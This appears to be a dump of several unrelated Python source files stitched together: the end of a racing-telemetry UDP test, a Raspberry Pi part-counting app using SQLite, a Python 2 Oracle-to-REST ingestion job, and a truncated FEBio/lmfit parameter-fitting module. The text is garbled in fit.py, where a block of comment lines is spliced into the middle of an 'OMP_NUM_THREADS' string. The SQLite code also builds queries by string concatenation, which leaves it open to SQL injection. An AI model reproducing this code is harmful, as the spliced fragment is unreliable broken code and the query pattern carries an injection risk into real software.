packet_version=pcars_udp.TelemetryData.VERSION,
partial_packet_index=1,
partial_packet_number=1),
speed=123.45))
self.packets.put(pcars_udp.GameStateData(
base=pcars_udp.PacketBase(
packet_type=pcars_udp.GameStateData.TYPE,
packet_version=pcars_udp.GameStateData.VERSION,
partial_packet_index=1,
partial_packet_number=1),
track_temperature=25))
self.assertAlmostEqual(123.45, udp_socket.receive().speed, places=3)
self.assertEqual(25, udp_socket.receive().track_temperature)
def test_invalid_packet(self):
with pcars_udp.Socket() as udp_socket:
self.packets.put(bytes(500))
with self.assertRaises(racetools.errors.UnrecognisedPacketType):
udp_socket.receive()
def test_timeout(self):
with pcars_udp.Socket(timeout=0.01) as udp_socket:
with self.assertRaises(racetools.errors.Timeout):
udp_socket.receive()
|
autoprn1.py
|
"""
Project_name: AUTO PRN PROJECT
Author: Rakesh Ranjan Jena
Dept: IMS
Company: BEST KOKI AUTOMOTIVE PVT. LTD.
Start Date:02.03.2021
Implement Date:
End Date:
DESCRIPTION:
This Project is for auto counting of OK NG Parts with Cycle time from each and every Machine.
This is IIoT Prject to Monitor Productivity of Machine and Process through Cycle time and OK,NG Count.
This Project is Applicable where PLC Communcication is Not Possible or PLC is OLDER or PLC is unable to send data to Server.
"""
#IMPORTING LIBRARY
import threading
#GTK Library
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GObject,GLib
#DATE and TIME Library
import datetime
from datetime import datetime
import time
import pytz
from datetime import timedelta
#DB API LIBRARY
import sqlite3
from sqlite3 import Error
#Rpi GPIO
import RPi.GPIO as GPIO
#URL LIBRARY
import urllib3
http = urllib3.PoolManager()
from gi.repository import Gtk
app_path="/home/pi/autoprn/"
database = app_path+"autoprn.db"
class Handler:
def onDestroy(self, *args):
Gtk.main_quit()
# GLOBAL VARIABLES
device_id="BK-IMS-2021-DEV100"
device_time_stamp=datetime.now()
#variable Declaration For Timer Operation
start_count_signal=0
#GPIO Operation VARIABLES
OK=0
NG=0
model=""
remark=""
now = datetime.now(tz=pytz.timezone('Asia/Kolkata'))
device_time_stamp=(str(now.strftime('%Y-%m-%d %H:%M:%S-%f')))
device_date=(str(now.strftime('%Y-%m-%d')))
device_time=(str(now.strftime('%H:%M:%S')))
#DB CONNECTION
def create_connection(db_file):
conn = None
try:
conn = sqlite3.connect(db_file)
except Error as e:
print(e)
return conn
#Update Model DB
def update_model_from_server():
global database
payload = {'process_name': 'SHAFT GRINDING'}
url = 'http://192.168.3.19/eol/module/autoprn/API/getModel.php'
try:
req = http.request('GET', url, fields=payload)
except ConnectionError:
raise Exception('Unable to get updates after {} seconds of ConnectionErrors'.format(connection_timeout))
model=req.data.decode('utf-8')
model=model.rstrip()
model=model.lstrip()
model=model.split(',')
#model=''.join(model).split()
#print(model[0])
for part in model:
if part!='':
try:
conn = create_connection(database)
command="SELECT part_name from model WHERE part_name='"+str(part)+"'"
#print(command)
cursor = conn.execute(command)
if cursor.fetchone():
print("Already Exist!")
else:
print("Part Not found with name: "+part)
command="INSERT INTO model(part_name) VALUES ('"+str(part)+"')"
#print(command)
conn.execute(command)
conn.commit()
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
print("Model Updated")
conn.close()
#UODATE MODEL CALL
update_model_from_server()
#DB OPEERATIONS
def update_data_db():
global model
global OK
global NG
global device_time_stamp
global device_date
global device_time
global database
#last_data_db_ok=0
#last_data_db_ng=0
#last_data_db_date=""
if not (model == None or model == ''):
try:
conn = create_connection(database)
command="SELECT * FROM data WHERE model='"+str(model)+"' AND date='"+str(device_date)+"'"
#print(command)
cursor = conn.execute(command)
data_1=cursor.fetchall()
if len(data_1)>0:
for row in data_1:
#last_data_db_date=str(row[1])
last_data_db_ok=int(row[4])
last_data_db_ng=int(row[5])
print(last_data_db_ok,last_data_db_ng)
if OK<last_data_db_ok or NG<last_data_db_ng:
#NEW DATA ADDED
OK+=last_data_db_ok
NG+=last_data_db_ng
print("Data Updated")
command="UPDATE data SET date='"+device_date+"',time='"+device_time+"',OK="+str(OK)+",NG="+str(NG)+",time_stamp='"+str(device_time_stamp)+"',sync=0 WHERE model='"+str(model)+"' AND date='"+str(device_date)+"'"
#print(command)
#conn.commit()
else:
print("Part Model found with name, New Addition: "+model)
command="INSERT INTO data(date,time,model,OK,NG,time_stamp,sync) VALUES ('"+device_date+"','"+device_time+"','"+str(model)+"',"+str(OK)+","+str(NG)+",'"+str(device_time_stamp)+"',0)"
#print(command)
conn.execute(command)
conn.commit()
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
conn.commit()
print("Data Updated")
conn.close()
def create_historian_data():
global prev_OK
global prev_NG
global model
global OK
global NG
global device_time_stamp
global device_date
global device_time
global database
global duration_in_s
global idle_time_in_sec
global remark
if not ((OK == prev_OK and NG == prev_NG) or (model == None or model == '')):
try:
conn = create_connection(database)
command="INSERT INTO historian(model,date,time,OK,NG,time_stamp,cycle_time,idle_time,remark) VALUES ('"+str(device_date)+"','"+str(device_time)+"','"+str(model)+"',"+str(OK)+","+str(NG)+",'"+str(device_time_stamp)+"','"+str(duration_in_s)+"',"+str(idle_time_in_sec)+",'"+str(remark)+"')"
#print(command)
conn.execute(command)
conn.commit()
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
print("History Updated")
conn.close()
prev_OK=OK
prev_NG=NG
idle_time_in_sec=0
else:
print("Same Data")
def main():
global database
database = app_path+"autoprn.db"
conn = create_connection(database)
builder = Gtk.Builder()
builder.add_from_file(app_path+"autoprn.glade")
builder.connect_signals(Handler())
#GET GUI Objects
date_label= builder.get_object("date_label")
shift_label= builder.get_object("shift_label")
model_box= builder.get_object("model_box")
count_btn= builder.get_object("count_btn")
OK_label= builder.get_object("OK_label")
NG_label= builder.get_object("NG_label")
#Sensor Labels
inp1_label= builder.get_object("inp1_label")
inp2_label= builder.get_object("inp2_label")
inp3_label= builder.get_object("inp3_label")
inp4_label= builder.get_object("inp4_label")
inp5_label= builder.get_object("inp5_label")
inp6_label= builder.get_object("inp6_label")
#OUTPUT Label
out1_label= builder.get_object("out1_label")
out2_label= builder.get_object("out2_label")
#Target and Completed Label
target_label= builder.get_object("target_label")
completed_label= builder.get_object("completed_label")
device_id_label= builder.get_object("device_id_label")
info_label= builder.get_object("info_label")
cycle_time_label= builder.get_object("cycle_time_label")
idle_time_label= builder.get_object("idle_time_label")
btn_man=builder.get_object("btn_man")
btn_machine=builder.get_object("btn_machine")
btn_material=builder.get_object("btn_material")
btn_method=builder.get_object("btn_method")
def update_model_data():
try:
conn = sqlite3.connect(database)
command="SELECT part_name from model"
#print(command)
cursor = conn.execute(command)
for row in cursor:
model_box.append_text(row[0])
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
print("Model Updated")
conn.close()
update_model_data()
def get_device_id():
sql=""
data=""
cur = conn.cursor()
cur.execute(sql, data)
conn.commit()
def update_local_time():
global device_time_stamp
global device_date
global device_time
now = datetime.now(tz=pytz.timezone('Asia/Kolkata'))
date_label.set_text(str(now.strftime('%B %d, %Y %H:%M:%S')))
device_time_stamp=(str(now.strftime('%Y-%m-%d %H:%M:%S-%f')))
device_date=(str(now.strftime('%Y-%m-%d')))
device_time=(str(now.strftime('%H:%M:%S')))
#print(device_time_stamp)
def update_data_model(self):
global model
global OK
global NG
OK=0
NG=0
model=model_box.get_active_text()
#if start_count_signal==1:
info_label.set_text("Selected Part: " + str(model))
if model==None:
start_count_signal=0
else:
start_count_signal=1
print(start_count_signal)
count_btn.connect("clicked",update_data_model)
#Definition to Set OK and NG =o if Model is undeified. Print UIUX and Database
def update_data():
global OK
global NG
global model
global in1
global in3
if model==None or model=="":
OK=0
NG=0
OK_label.set_text(str(OK))
NG_label.set_text(str(NG))
inp1_label.set_text(str(in1))
inp2_label.set_text(str(in3))
#print("Hello WORLD 1")
def update_cycle_time():
global dle_time_in_sec
global duration_in_s
idle_time_label.set_text(str(idle_time_in_sec))
cycle_time_label.set_text(str(duration_in_s))
def main_target():
global prev_OK
global prev_NG
global OK
global NG
global idle_time_in_sec
global duration_in_s
global in1
global in3
prev_OK=0
prev_NG=0
idle_time_in_sec=0
duration_in_s=0
input_pin1=16
input_pin2=12
input_pin3=26
output_pin1=20
output_pin2=21
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(input_pin1, GPIO.IN)
GPIO.setup(input_pin2, GPIO.IN)
GPIO.setup(input_pin3, GPIO.IN)
GPIO.setup(output_pin1, GPIO.OUT)
GPIO.setup(output_pin2, GPIO.OUT)
while True:
duration_in_sec=0
idle_count_flag=0
idle_time_start=datetime.now()
#sensor and Pin Configuration Variables, I/O Pin Varibles
d1=0
d0=0
in1=GPIO.input(input_pin1)
in2=GPIO.input(input_pin2)
in3=GPIO.input(input_pin3)
#Momnitor Sensor Value Loop
while in1==0:
#start Cycle Time Count
if idle_count_flag==0:
idle_count_flag=1
first_time = datetime.now()
print("OK Loop")
in1=GPIO.input(input_pin1)
in3=GPIO.input(input_pin3)
if in1==1:
OK+=1
if in3==0:
d0+=1
if in3==1:
if d0>=1:
NG+=1
d0=0
print("d0:"+str(d0))
print(OK, NG)
while in3==0:
if idle_count_flag==0:
idle_count_flag=1
first_time = datetime.now()
print("In NG Loop")
in3=GPIO.input(input_pin3)
in1=GPIO.input(input_pin1)
if in3==1:
NG+=1
if in1==0:
d1+=1
if in1==1:
if d1>=1:
OK+=1
d1=0
print("d1:"+str(d1))
print(OK, NG)
print(model,OK, NG)
#if model !=None and model==!=""
print(in1,in3)
print(prev_OK,prev_NG)
#time.sleep(1)
#GLib.idle_add()
later_time = datetime.now()
if idle_count_flag==0:
difference=0
duration_in_sec=0
difference = later_time-idle_time_start
duration_in_sec = float(difference.total_seconds())*10
idle_time_in_sec += round(duration_in_sec,4)
#idle_time_in_sec=idle_time_in_sec
print("Idle Time"+str(idle_time_in_sec))
else:
difference = later_time - first_time
duration_in_s = float(difference.total_seconds())
print("Cycle Time"+ str(duration_in_s))
create_historian_data()
update_data_db()
#idle_time_in_sec=0
GLib.idle_add(update_cycle_time)
GLib.idle_add(update_data)
GLib.idle_add(update_local_time)
#GLib.idle_add(update_data_db)
#difference = later_time - first_time
time.sleep(0.01)
GPIO.cleanup()
thread = threading.Thread(target=main_target)
thread.daemon = True
thread.start()
#update Date and Time
window = builder.get_object("window1")
window.fullscreen()
window.show_all()
window.connect("destroy", Gtk.main_quit)
#GObject.timeout_add(100, print("Hello"))
Gtk.main()
if __name__ == '__main__':
main()
|
processRecords (3).py
|
#!/bin/python
# -*- coding: utf-8 -*-
# $Author: stevedrewe $
# $Date: 2016-12-16 14:34:16 +0000 (Fri, 16 Dec 2016) $
# $URL: http://svn.avox.national/svn/scripts/branches/TAS-544/linux/avoxpdb1/avoxuser/python2/data_ingestion/postToEndpoint.py $
# $Rev: 3107 $
# Standard Modules
import random
import sys
import base64
import datetime
import time
import os.path
import requests
import json
import cx_Oracle
from requests.auth import HTTPBasicAuth
from multiprocessing import Process, Queue, current_process
# Custom Modules
import localEnv
import avoxUtils
from automationError import ParameterError, CountryError
import dataIngestDefn
# Set HTTP header to Send/Accept json
HEADERS = {"Content-Type": "application/json", "Accept": "application/json"}
def worker(taskqueue, returnqueue):
# Entry point for worker processes
for func, args in iter(taskqueue.get, 'STOP'):
print "in worker", current_process().name, func.__name__
result = func(*args)
returnqueue.put(result, True)
# Add small time delay to allow unix pipe to sync before next iteration
time.sleep(0.1)
def posttoendpoint(cr_id, ep, parameters):
# REST POST Function
print cr_id, ep
rs = requests.session()
rs.headers = HEADERS
try:
# rs.auth = HTTPBasicAuth(localEnv.kfUser, base64.b64decode(localEnv.kfUserPwd))
rs = requests.post(ep, headers=HEADERS, data=parameters, timeout=dataIngestDefn.httpTimeout,
auth=HTTPBasicAuth(localEnv.kfUser, base64.b64decode(localEnv.kfUserPwd)))
restret = (cr_id, rs.status_code, ep, parameters)
# time.sleep(100*random.random())
# restret = (cr_id, 200, ep, parameters)
except requests.Timeout, rte:
restret = (cr_id, 504, ep, rte)
except Exception, re_:
restret = (cr_id, 500, ep, re_)
finally:
rs.close()
return restret
def insertLog(con, rows):
ins_csr = con.cursor()
ins_csr.prepare(" INSERT INTO entity_process_log \
(cr_id,event_code,status_code,event_timestamp,user_id,program_name,record_creation_ts,process_type,ovn,created_by, \
epi_id, event_outcome, outcome_detail) \
VALUES \
(:1, :2, :3, :4, :5, :6, :7, :8, :9, :10,:11,:12,:13)")
ins_csr.executemany(None, rows)
con.commit()
ins_csr.close()
def updateProcessed(con, rows):
upd_csr = con.cursor()
# Set record to processed in the propagate table
upd_csr.prepare(" UPDATE entity_propagate_internal \
SET processed = 'Y', record_processed_ts = systimestamp \
WHERE cr_id = :1 \
AND process_type = :2 \
AND processed = 'N'")
upd_csr.executemany(None, rows)
# Remove record from Data Ingestion Pot so it isn't processed again
#upd_csr = con.cursor()
upd_csr.prepare(" UPDATE era_queues \
SET staff_id = (SELECT ID FROM staff WHERE username = 'SOutput') \
WHERE cr_id = :1")
rows = [(x[0],) for x in rows]
upd_csr.executemany(None, rows)
con.commit()
upd_csr.close()
#
# Start of the main processing script
#
# Check for process lock file, if found exit
if os.path.isfile(dataIngestDefn.lockFile):
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + "Data Ingestion skipped",
"Lock file found. Data Ingestion Run skipped.")
sys.exit(0)
# Set the environment
#avoxUtils.setvars("")
starttime = datetime.datetime.now()
avoxUtils.jobctl(dataIngestDefn.pType, 'START')
# Write a lock file to cater for kofax taking longer than cron time to process the data
lckFile = open(dataIngestDefn.lockFile, 'w')
lckFile.write("Running.")
lckFile.close()
rowcount = 0
commitunit = avoxUtils.fetchArraySize()
fnTime = datetime.datetime.now().strftime("%d%m%Y%H%M%S")
excFname = 'endPointexceptions' + fnTime + '.txt'
# Get processing parameters
try:
postBatchSize = avoxUtils.getSysParam(6495, 'kapowPOSTBatchSize', 'NUMBER')
postProcesses = avoxUtils.getSysParam(6495, 'kapowPyProcesses', 'NUMBER')
except ParameterError as e:
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
print(e.msg)
# exit()
try:
endPoints = {}
jurisdictions = {}
avoxUtils.getEndpoints(endPoints, jurisdictions)
if len(endPoints) == 0:
print ('No endpoints found.')
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' No Endpoints found.',
'No Endpoints found in Application Lookups where lookup type is '
+ dataIngestDefn.endPointLkpType)
except Exception:
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
# Raise the exception
raise
#
# Now process the records waiting in the db
#
# Initialize the record arrays
insertArray = []
updateArray = []
excArray = []
tasklist = []
statelist = avoxUtils.getstatelist()
# Initialize the end point dictionary, this will be a dictionary of lists : {<lookup_id>:[<lists of endpoint urls>]}
epd = {}
try:
conn = cx_Oracle.connect(localEnv.dbUser, base64.b64decode(localEnv.dbUserPwd), localEnv.tnsname)
qry = conn.cursor()
# evt = dataIngestDefn.dbEvt + "_API"
bind = {'event': dataIngestDefn.dbEvt, 'rcount': postBatchSize}
qry.execute(
"SELECT * FROM (SELECT epi.cr_id, cr.status, epi.process_data, epi.epi_id \
FROM entity_propagate_internal epi, central_records cr \
WHERE epi.processed = 'N' AND epi.process_type = :event AND epi.cr_id = cr.cr_id \
ORDER BY record_creation_ts desc) \
WHERE rownum <=:rcount", bind)
# columns = [i[0] for i in qry.description]
for row in qry:
rowcount += 1
# Get the jurisdiction value of the record
record = row[2].read().split('^')
rCtry = record[4]
# We should look at only mapping state for countries with known jurisdictions at that level
# e.g. US,CA,AU,HK via the country code state list accounting for any name variations
prc = conn.cursor()
twoccc = prc.var(cx_Oracle.STRING)
states = prc.var(cx_Oracle.STRING)
# print(rCtry)
prc.callproc("map_country_name", [rCtry, twoccc, states])
# Check the mappings for this value
try:
if twoccc.getvalue() is None:
rJuris = None
raise CountryError(rCtry, 'No 2-char country mapping found.')
elif states.getvalue() == 'Y' and len(record[3]) > 0:
rJuris = twoccc.getvalue() + '-' + record[3].upper()
else:
rJuris = twoccc.getvalue().upper()
epJuris = jurisdictions[rJuris]
# This gives the lookup_id to use to get the list of endpoints
endpoint = endPoints[epJuris]
# If the list of endpoints haven't been loaded then fetch them
try:
urls = []
urls = epd[endpoint]
except Exception:
try:
epd[endpoint] = avoxUtils.getEPList(endpoint)
urls = epd[endpoint]
except Exception:
raise
# Add the process data into a dict and then dump into json
data = {"variableName": "company_in", "attribute": [{"type": "text", "name": "legal_name_search",
"value": record[0]}, {"type": "text", "name": "cr_id",
"value": str(row[0])}]}
jData = json.dumps({"parameters": [data]})
# Now post to each of the end point URLs
for endpoint in urls:
# print(endpoint)
if endpoint.endswith("robot"):
try:
#rs = requests.post(endpoint, data = jData, timeout=dataIngestDefn.httpTimeout)
#rs = requests.post(endpoint, headers=headers, data=jData, timeout=dataIngestDefn.httpTimeout, auth=HTTPBasicAuth(localEnv.kfUser, base64.b64decode(localEnv.kfUserPwd)))
tasklist.append((posttoendpoint, (row[0], endpoint, jData)))
#insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
# dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],rs.status_code,endpoint))
#if rs.status_code > 299:
# print (rs.status_code)
# excArray.append((row[0], rJuris, "%s%s%s%s%s" % ("Received: ", str(rs.status_code), " from: ", endpoint, str(rs.content))))
except Exception, e:
# Log the error
excArray.append((row[0], rJuris, 'Error encountered for:' + endpoint + ' : ' + str(e)))
insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1,
0, row[3], 500, str(e)))
# Add the record to the update array
updateArray.append((row[0], dataIngestDefn.dbEvt))
# Call the endpoints via a queue and set of workers
# First create the task and return queues and add all the request calls to it
task_queue = Queue()
done_queue = Queue()
for task in tasklist:
task_queue.put(task, True)
# print ('Task Queue loaded at: ', datetime.datetime.now().strftime("%d%m%Y%H%M%S"))
except CountryError, e:
excArray.append((row[0], e.cname, e.msg))
updateArray.append((row[0], dataIngestDefn.dbEvt))
insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],
404, e.cname + ': ' + e.msg))
except Exception, e:
excArray.append((row[0], rJuris, 'Endpoint Mapping failed.'))
updateArray.append((row[0], dataIngestDefn.dbEvt))
insertArray.append((row[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],
404, str(e)))
if rowcount == commitunit:
print('time to run a batch...')
procs = []
# Start worker processes
print (postProcesses, ' Processes Starting at: ', datetime.datetime.now().strftime("%d%m%Y%H%M%S"))
for i in range(int(postProcesses)):
proc = Process(target=worker, args=(task_queue, done_queue))
procs.append(proc)
proc.start()
# Tell worker processes to stop
print "signal stop to workers..."
for i in range(int(postProcesses)):
task_queue.put('STOP', True)
time.sleep(0.1)
# Wait for the processes to finish and then finalize them
print "wait for workers to stop and tidy up..."
for p in procs:
p.join()
# Now dequeue all the results and add to the dml arrays
print "start dequeue of results..."
for i in range(len(tasklist)):
ret = done_queue.get(True)
time.sleep(0.1)
for x in range(len(ret)):
# Add return details to the log file and the db event log array
# print '\t', ret[x]
insertArray.append((ret[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0,
row[3], ret[1], ret[2]))
# If the HTTP code isn't in the success range add it to the exception array
if ret[1] > 299:
# print (rs.status_code)
excArray.append((row[0], rJuris, "%s%s%s%s%s" % ("Received: ", str(ret[1]), " from: ", ret[2],
ret[3])))
# Reset the tasklist list
tasklist = []
insertLog(conn, insertArray)
#updateProcessed(conn, updateArray)
# Reset the insert array
insertArray = []
updateArray = []
# Write the exceptions to the file
if len(excArray) > 0:
excLogFile = open(excFname, 'a')
excLogFile.write(dataIngestDefn.excLogHdr + '\n')
for line in excArray:
excLogFile.write("%s%s%s%s%s%s" % (str(line[0]), "^", str(line[1]), "^", str(line[2]), "\n"))
# Reset the exceptions array
excArray = []
# Check the last batch of records
if len(insertArray) > 0:
print "run last batch..."
procs = []
# Start worker processes
print (postProcesses, ' Processes Starting at: ', datetime.datetime.now().strftime("%d%m%Y%H%M%S"))
for i in range(int(postProcesses)):
proc = Process(target=worker, args=(task_queue, done_queue))
procs.append(proc)
proc.start()
# Tell worker processes to stop
print "signal stop to workers..."
for i in range(int(postProcesses)):
task_queue.put('STOP', True)
time.sleep(0.1)
# Wait for the processes to finish and then finalize them
print "wait for workers to stop and tidy up..."
for p in procs:
p.join()
# Now dequeue all the results and add to the dml arrays
print "start dequeue of results..."
for i in range(len(tasklist)):
ret = done_queue.get(True)
time.sleep(0.1)
for x in range(len(ret)):
# Add return details to the log file and the db event log array
# print '\t', ret[x]
insertArray.append((ret[0], dataIngestDefn.outboundEvt, row[1], datetime.datetime.now(), 0,
dataIngestDefn.progName, datetime.datetime.now(), dataIngestDefn.pType, 1, 0, row[3],
ret[1], ret[2]))
# If the HTTP code isn't in the success range add it to the exception array
if ret[1] > 299:
# print (rs.status_code)
excArray.append((row[0], rJuris, "%s%s%s%s%s" % ("Received: ", str(ret[1]), " from: ", ret[2],
ret[3])))
# Reset the tasklist list
tasklist = []
insertLog(conn, insertArray)
# Commented for testing
#updateProcessed(conn, updateArray)
# Write the exceptions to the file
if len(excArray) > 0:
excLogFile = open(localEnv.LOG_DIR + '/' + excFname, 'a', 0)
excLogFile.write(dataIngestDefn.excLogHdr + '\n')
for line in excArray:
excLogFile.write(str(line[0]) + '^' + str(line[1]) + '^' + str(line[2]) + '\n')
except cx_Oracle.DatabaseError as e:
error, = e.args
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
if error.code == 1017:
print "Invalid credentials. Login failed."
else:
print(error)
#print "Database connection error: %s".format(e)
# Create log file and send email
logFile = open(localEnv.LOG_DIR + '/processRecords.log', 'w')
logFile.write('Database Error: ' + str(localEnv.tnsname) + '\n')
logFile.write(str(error.message))
logFile.close()
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' Database Error.',
'Database Error, see log file.', localEnv.LOG_DIR + '/processRecords.log')
except Exception, e:
print(e)
avoxUtils.jobctl(dataIngestDefn.pType, 'FAIL')
logFile = open(localEnv.LOG_DIR + '/processRecords.log', 'w')
logFile.write(str(e.message))
logFile.close()
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' Python Data Ingestion Error.',
'Unhandled Exception, see log file.', localEnv.LOG_DIR + '/processRecords.log')
# Ensure that we always disconnect from the database
finally:
qry.close()
conn.close()
if os.path.isfile(dataIngestDefn.lockFile):
os.remove(dataIngestDefn.lockFile)
if os.path.isfile(localEnv.LOG_DIR + '/' + excFname):
excLogFile.close()
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + ' Data Ingestion Endpoint Errors.',
'See attached file.', localEnv.LOG_DIR + '/' + excFname)
endtime = datetime.datetime.now()
avoxUtils.jobctl(dataIngestDefn.pType, 'SUCCESS')
print(endtime - starttime)
|
fit.py
|
"""
This module allows to execute flexible fitting procedures, with full control
of the fitting method, variables, calculations and experimental data formats.
# TODO
- LMFIT library works on serial numerical approximations to obtain a jacobian,
however, when the residual function is time expensive, the fitting process
is too long. A parallel jacobian calculation is implemented, but it is quite rudimental,
so is disabled in the source code by now.
"""
import numpy as np
import lmfit
from scipy.interpolate import interp1d
import xml.etree.ElementTree as ET
import os
import subprocess
import threading
import sys
import time
from datetime import datetime
import psutil
from sklearn.metrics import r2_score
import interFEBio
from scipy.ndimage import interpolation
import signal
class _caso:
def __init__(self,modelName,matID,subFolder,expData,simFcn):
self.modelName = modelName
self.modelBinary = modelName.split('.feb')[0]+'.xplt'
self.matID = matID
self.subFolder = subFolder
self.expData = expData
self.current_directory = os.getcwd()
self.simFcn = simFcn
self.parameters = []
def addParameter(self,param):
self.parameters.append(param)
def writeCase(self,params,iter):
pars = dict(params.valuesdict())
originalTree = ET.parse(self.modelName)
tree = originalTree
root = tree.getroot()
for material in root.findall('.//material'):
if(material.attrib['id'] == str(self.matID) or material.attrib['name'] == str(self.matID)):
for const in material:
#print(const.tag, self.parameters)
if(const.tag in self.parameters):
#print(pars[const.tag])
const.text = '{:.20e}'.format(pars[const.tag])
#print(const.tag,const.text)
#print(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder))
tree.write(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder)+'/'+self.modelName,encoding='ISO-8859-1', xml_declaration=True)
# for p in pars.keys():
# if params[p].expr == None:
# tree = originalTree
# root = tree.getroot()
# for material in root.findall('.//material'):
# if(material.attrib['id'] == str(self.matID)):
# for const in material:
# #print(const.tag, self.parameters)
# if(const.tag in self.parameters and const.tag == p):
# #print(pars[const.tag])
# const.text = '{:.20e}'.format(pars[const.tag]*(1+0.05)/1000.0)
# if(const.tag in self.parameters and const.tag != p):
# const.text = '{:.20e}'.format(pars[const.tag]/1000.0)
# #print(const.tag,const.text)
# #print(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder))
# tree.write(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder,p)+'/'+self.modelName.split('.')[0]+'_'+p+".feb",encoding='ISO-8859-1', xml_declaration=True)
def verifyFolders(self,iter,p):
pars = dict(p.valuesdict())
iterDir = os.path.join(self.current_directory, 'iter'+str(iter))
if not os.path.exists(iterDir):
os.makedirs(iterDir)
simDir = os.path.join(iterDir, self.subFolder)
if not os.path.exists(simDir):
os.makedirs(simDir)
# for par in pars.keys():
# if p[par].expr == None:
# paramPath = os.path.join(simDir, par)
# if not os.path.exists(paramPath):
# os.makedirs(paramPath)
# def simToFunctions(self,iter,parameter):
# param = parameter.keys()
# stretch,stress = self.rawResults(iter,'')
# funSim = dict()
# funSim['fx'] = interp1d(stretch, stress,fill_value='extrapolate')
# for p in param:
# if parameter[p].expr == None:
# stretch,stress = self.rawResults(iter,p)
# funSim[p] = interp1d(stretch, stress,fill_value='extrapolate')
#
# return funSim
#
# def singleSimToFunction(self,iter):
# stretch,stress = self.rawResults(iter,'')
# funSim = interp1d(stretch, stress,fill_value='extrapolate')
# return funSim
def simResults(self,iter):
file = 'iter'+str(iter)+'/'+self.subFolder+'/'+self.modelBinary
x, y = self.simFcn(self,file)
np.savetxt(os.path.join(self.current_directory, 'iter'+str(iter),self.subFolder)+'/result.txt',np.transpose([x, y]))
return x, y
class fit:
'''
Class that handles the numerical fitting algotirm.
This class is based on lmfit library.
'''
def __init__(self):
self.iter = 1
self.p = lmfit.Parameters()
self.mi = 0 #Used for saving fit results
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
current_date = datetime.today().strftime('%d-%m-%Y')
self.logfileName = 'log_'+current_date+'_'+current_time+'.txt'
self.len1 = dict()
signal.signal(signal.SIGINT, self._signal_handler)
self.pid = dict()
self.casos = dict()
self.exp = dict()
self.done = 0
self.thisIter = 0
self.disp1 = dict()
def addCase(self,name,matID,modelName,subFolder,expData,simFcn):
'''
Add a simulation to the fitting algorithm, including all the experimental data
and how to obtain numerical results for this xplt file.
Args:
----------
modelName (str): Name of the .feb model
matID (int/str): id/name of the material to be fitted in that particular .feb file
subFolder (str): Sub folder to store the simulation at each iteration.
expData (np array): Array of x,y experimental data associated with the current simulation.
simFcn (fuinction): Function that handles the result calculation of the simulation. Needs to be written in terms of the xplt class functions.
'''
self.casos[name] = _caso(modelName,matID,subFolder,expData,simFcn)
def _updateParamList(self):
#os.environ['OMP_NUM_THR # for par in pars.keys():
# if p[par].expr == None:
# paramPath = os.path.join(simDir, par)
# if not os.path.exists(paramPath):
# os.makedirs(paramPath)EADS'] = str(round(psutil.cpu_count()/2/(len(self.p.valuesdict())-1)))
self.parVals = self.p.valuesdict()
for key in self.parVals.keys():
for caso in self.casos:
self.casos[caso].addParameter(key)
def _run(self,caso,dh):
if(dh == ''):
p = subprocess.Popen(["febio3 -i "+self.casos[caso].modelName],shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT,cwd=os.path.join('iter'+str(self.iter),self.casos[caso].subFolder)+'/')
print("Running simulation "+os.path.join('iter'+str(self.iter),self.casos[caso].subFolder)+'/'+self.casos[caso].modelName+ ". PID: ",p.pid)
else:
p = subprocess.Popen(["febio3 -i "+self.casos[caso].modelName.split('.')[0]+'_'+dh+'.feb'],shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT,cwd=os.path.join('iter'+str(self.iter),self.casos[caso].subFolder,dh)+'/')
print("Running simulation "+os.path.join('iter'+str(self.iter),self.casos[caso].subFolder)+'/'+self.casos[caso].modelName.split('.')[0]+'_'+dh+'.feb'+ ". PID: ",p.pid)
self.pid[caso] = p.pid
p.communicate()
p.wait()
#sys.exit()
def _expToFunction(self):
self.expfcn = dict()
for caso in self.casos:
self.expfcn[caso] = interp1d(self.casos[caso].expData[:,0], self.casos[caso].expData[:,1],fill_value='extrapolate')
def _statistics(self,p):
parameters = dict(p.valuesdict())
self.r2 = dict()
for case in self.casos:
actual = self.expfcn[case](self.results[case][0])
predict = self.results[case][1]
R_sq = r2_score(actual, predict)
self.r2[case] = R_sq
self.logfile = open(self.logfileName, 'a')
self.logfile.write('iter '+str(self.iter)+'\t')
self.logfile.write(datetime.now().strftime("%H:%M:%S")+':\n')
self.logfile.write('\t'+'r2 = ')
self.logfile.write(str(self.r2))
self.logfile.write('\n')
self.logfile.write('\t'+'Parameters = ')
self.logfile.write(str(parameters))
self.logfile.write('\n')
self.logfile.close()
def _residual(self,p):
